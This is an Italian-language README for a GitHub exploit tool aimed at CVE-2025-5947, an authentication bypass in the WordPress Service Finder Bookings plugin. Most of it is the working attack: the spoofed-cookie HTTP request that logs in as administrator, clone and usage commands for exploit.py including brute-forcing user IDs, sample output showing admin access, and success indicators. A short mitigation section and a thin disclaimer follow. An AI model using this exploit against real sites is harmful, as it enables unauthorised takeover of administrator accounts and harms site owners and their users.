
CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit
CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit
Strumento di exploit per la vulnerabilità di bypass dell'autenticazione nel plugin WordPress Service Finder Bookings ≤ 6.0
Nel plugin WordPress Service Finder Bookings versione 6.0 e precedenti è presente una vulnerabilità critica di bypass dell'autenticazione.
Attaccanti non autenticati possono:
Nella funzione service_finder_switch_back() c'è una verifica insufficiente del cookie:
// Codice non sicuro
if(isset($_COOKIE['original_user_id'])) {
$user_id = $_COOKIE['original_user_id'];
wp_set_current_user($user_id);
// Nessuna verifica!
}
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1
Caratteristiche dell'Attacco:
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947
pip install -r requirements.txt
python exploit.py -u http://target.com
# Mostra aiuto
python exploit.py -h
# Tenta l'accesso come amministratore (ID=1)
python exploit.py -u http://target.com
# Con ID utente specifico
python exploit.py -u http://target.com -i 5
# Forza bruta (ID 1-10)
python exploit.py -u http://target.com -b 1-10
# Senza verifica SSL
python exploit.py -u http://target.com --no-ssl-verify
# Con timeout personalizzato
python exploit.py -u http://target.com -t 30
python exploit.py -u http://wordpress.local
Output:
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Plugin Service Finder Bookings trovato
🔍 Tentativo di accesso con ID utente 1 in corso...
📊 HTTP Status: 302
📋 Response Headers:
Location: http://wordpress.local/wp-admin/
Set-Cookie: wordpress_logged_in_abc123=...
✅ SUCCESSO! Accesso effettuato come amministratore!
📍 Reindirizzamento: http://wordpress.local/wp-admin/
python exploit.py -u http://target.com -b 1-20
Output:
🔄 Forza Bruta in corso (20 utenti)...
✅ ID utente 1: SUCCESSO
❌ ID utente 2: Fallito
✅ ID utente 3: SUCCESSO
...
✅ Utenti riusciti: [1, 3, 5]
python exploit.py -u https://target.com --no-ssl-verify
Un exploit riuscito include i seguenti indicatori:
✅ Codice di risposta HTTP 301 o 302
✅ Presenza di /wp-admin/ nell'header Location
✅ Presenza di wordpress_logged_in_ nell'header Set-Cookie
Questo strumento deve essere utilizzato solo per:
L'autore non si assume alcuna responsabilità.
Aggiornamento Urgente
# Aggiorna dal pannello di amministrazione WordPress
# o con WP-CLI
wp plugin update sf-booking
Disattivare il Plugin
wp plugin deactivate sf-booking
Rimuovere il Plugin
wp plugin delete sf-booking
Web Application Firewall (WAF)
Blocca: /wp-admin/admin-ajax.php?action=service_finder_switch_back
Controllo di Sicurezza
Per segnalare bug o suggerire miglioramenti:
git checkout -b feature/improvement)git commit -am 'Add improvement')git push origin feature/improvement)MIT License - Per i dettagli consulta il file LICENSE
Security Researcher
⭐ Se ti è stato utile, lascia una stella!
| Caratteristica | Valore |
|---|
| CVE ID | CVE-2025-5947 |
| Plugin | Service Finder Bookings (sf-booking) |
| Versione Interessata | ≤ 6.0 |
| Gravità | 🔴 CRITICA |
| Punteggio CVSS | 9.8 |
| CWE | CWE-639 (Bypass dell'autorizzazione) |
| Punteggio EPSS | 0.617 (98.357 percentile) |
| Data di Pubblicazione | 2025 |
| Parametro | Abbreviazione | Descrizione | Predefinito |
|---|
--url | -u | URL di destinazione (obbligatorio) | - |
--user-id | -i | ID utente | 1 |
--brute-force | -b | Intervallo di forza bruta (1-10) | - |
--no-ssl-verify | - | Disabilita verifica SSL | False |
--timeout | -t | Timeout richiesta (secondi) | 10 |